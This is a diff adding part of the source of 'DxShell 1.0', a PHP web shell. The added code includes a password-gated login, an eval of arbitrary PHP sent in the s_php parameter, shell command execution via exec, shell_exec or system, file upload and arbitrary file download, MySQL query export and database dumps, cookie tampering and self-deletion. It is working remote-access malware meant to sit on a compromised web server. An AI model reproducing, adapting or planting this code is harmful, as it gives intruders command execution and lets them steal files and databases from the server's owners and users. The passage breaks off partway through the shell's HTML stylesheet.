+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{	if ($DXGLOBALSHIT)
+		{		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	header('Expires: '.Date('r', time()+60*60*24*300));
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_q']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_q\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	/* export as csv */
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Query_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.csv';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/comma-separated-values');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$_POST['dxsql_q']=explode(';',$_POST['dxsql_q']);
+
+	for ($q=0;$q<count($_POST['dxsql_q']);$q++)
+		{		if (empty($_POST['dxsql_q'][$q])) continue;
+		$num=DxMySQL_FetchResult(DxMySQLQ($_POST['dxsql_q'][$q], false), $DUMP, false);
+		$DxDOWNLOAD_File['content'].="\n\n".'QUERY: '.str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $_POST['dxsql_q'][$q] )).";";
+		if ($num<=0) {$DxDOWNLOAD_File['content'].="\n".'Empty;'; continue;}
+		foreach ($DUMP[0] as $key => $val) $DxDOWNLOAD_File['content'].=$key.";"; /* headers */
+		for ($l=0;$l<count($DUMP);$l++)
+			{			$DxDOWNLOAD_File['content'].="\n";
+			$INDEXES=array_keys($DUMP[$l]);
+			for ($i=0; $i<count($INDEXES); $i++)
+				$DxDOWNLOAD_File['content'].=str_replace(array("\n",";"), array('',"<-COMMA->"), str_replace("\r",'', $DUMP[$l][ $INDEXES[$i] ])).";";
+
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='SQLD' AND isset($_POST['dxsql_tables']))
+	{	if (!isset($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'],$_GET['dxsql_d'],$_POST['dxsql_tables']))
+		die(DxError('Not enough params: $_GET[\'dxsql_s\'],$_GET[\'dxsql_l\'],$_GET[\'dxsql_p\'],$_GET[\'dxsql_d\'],$_POST[\'dxsql_tables\'] needed'));
+
+	if ((mysql_connect($_GET['dxsql_s'],$_GET['dxsql_l'],$_GET['dxsql_p'])===FALSE) or (mysql_errno()!=0))
+		die(DxError('No connection to mysql server!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+	if (!mysql_select_db($_GET['dxsql_d']))
+		die(DxError('Can\'t select database!'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error()));
+
+	if (empty($_POST['dxsql_tables']))  die(DxError('No tables selected...'));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']='Dump_'.$_GET['dxsql_s'].'_'.$_GET['dxsql_d'].'.sql';
+	$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain');
+	$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.$DxDOWNLOAD_File['filename'].'";');
+	$DxDOWNLOAD_File['content']='';
+
+	$DxDOWNLOAD_File['content'].="\n\t".'/* '.str_repeat('=', 66);
+	$DxDOWNLOAD_File['content'].="\n\t".'==== MySQL Dump '.DxDate(time()).' - DxShell v'.$GLOB['SHELL']['Ver'].' by o_O Tync';
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Server: '.$_GET['dxsql_s'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== DB: '.$_GET['dxsql_d'];
+	$DxDOWNLOAD_File['content'].="\n\t".'==== Tables: '."\n\t\t\t".implode(', '."\n\t\t\t", $_POST['dxsql_tables']);
+	$DxDOWNLOAD_File['content'].="\n\t".str_repeat('=', 66).' */';
+
+	if (!empty($_POST['dxsql_q']))
+		{		$_POST['dxsql_q']=explode(';', $_POST['dxsql_q']);
+		foreach ($_POST['dxsql_q'] as $CUR)
+			if (empty($CUR)) continue; else DxMySQLQ($CUR, true); /* pre-query */
+		}
+
+	foreach ($_POST['dxsql_tables'] as $CUR_TABLE)
+		{		$DxDOWNLOAD_File['content'].=str_repeat("\n", 5).'/* '.str_repeat('-', 40).' */';
+		DxMySQL_FetchResult(DxMySQLQ('SHOW CREATE TABLE `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		$DxDOWNLOAD_File['content'].="\n".$DUMP[0][1];
+		$DxDOWNLOAD_File['content'].="\n\n";
+		DxMySQL_FetchResult(DxMySQLQ('SELECT * FROM `'.$CUR_TABLE.'`;', false), $DUMP, true);
+		for ($i=0; $i<count($DUMP); $i++)
+			{
+			for ($j=0;$j<count($DUMP[$i]);$j++) $DUMP[$i][$j]=mysql_real_escape_string($DUMP[$i][$j]);
+			$DxDOWNLOAD_File['content'].="\n".'INSERT INTO `'.$CUR_TABLE.'` VALUES ("'.implode('", "', $DUMP[$i]).'");';
+			}
+		}
+	}
+
+if ($_GET['dxmode']=='COOK' AND isset($_POST['dxparam']))
+	{	foreach ($_POST['dxparam'] as $name => $val)
+		{		if ($name=='DXS_NEWCOOK')
+			{
+			if (empty($val['NAM']) or empty($val['VAL'])) continue;			DxSetCookie($val['NAM'], $val['VAL'], time()+60*60*24*10);
+			}
+			else DxSetCookie($name, $val, (empty($val))?1:(time()+60*60*24*10));
+		}
+	DxGotoURL(DxURL('leave', 'dxmode'));
+	die();
+	}
+
+if (isset($_GET['dxinstant']))
+	{	$_GET['dxinstant']=strtoupper($_GET['dxinstant']);
+	if ($_GET['dxinstant']=='DEL')
+		{
+		$ok=@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));
+		print '<script>window.alert("SELF '.(  ($ok)?'deleted. Reload the page to believe me =)':'tried to delete but was unsuccessful'  ).'");</script>';
+		}
+	}
+
+function DxObGZ($s) {return gzencode($s);}
+
+if (isset($DxDOWNLOAD_File))
+	{/* File downloader for everything */
+	if (!$DXGLOBALSHIT)
+		{
+		if ($GLOB['SYS']['GZIP']['CanOutput'])
+			{
+			ini_set('output_buffering',4096);
+			ob_start("DxObGZ");
+			header('Content-Encoding: gzip');
+			}		for ($i=0; $i<count($DxDOWNLOAD_File['headers']); $i++) header($DxDOWNLOAD_File['headers'][$i]);
+		print $DxDOWNLOAD_File['content'];
+		die();
+		}
+	/* if u want to download file when $DXGLOBALSHIT, scroll down */
+	}
+
+###################################################################################
+####################++++++++++++++# M A I N #++++++++++++++++++####################
+###################################################################################
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die(DxError('Unknown $_GET[\'dxmode\']! check $GLOB[\'DxMODES\'] array'));
+
+########
+########   Main HAT (blackhat? =))) )
+########
+if (!in_array($_GET['dxmode'], array_keys($GLOB['DxMODES']))) die('Unknown $_GET[\'dxmode\']');
+
+if ($DXGLOBALSHIT)
+	print str_repeat("\n", 20).'<!--SHELL HERE-->';
+?>
+<html><head><title><?=$_SERVER['HTTP_HOST'];?> --= DxShell 1.0 - by o_O Tync =-- :: <?=$GLOB['DxMODES'][$_GET['dxmode']];?></title>
+<Meta Http-equiv="Content-Type" Content="text/html; Charset=windows-1251">
+<link rel="shortcut icon" href="<?=DxURL('kill','dxmode');?>&dxmode=IMG&dximg=DxS">
+<http://leet.phpnet.us/sh.gif>
+<style>
+img	 {border-width:0pt;}
+body, td 		{font-size: 10pt; color: #00B000; background-color: #000000; font-family: Arial;padding:2pt;margin:2pt; vertical-align:top;}
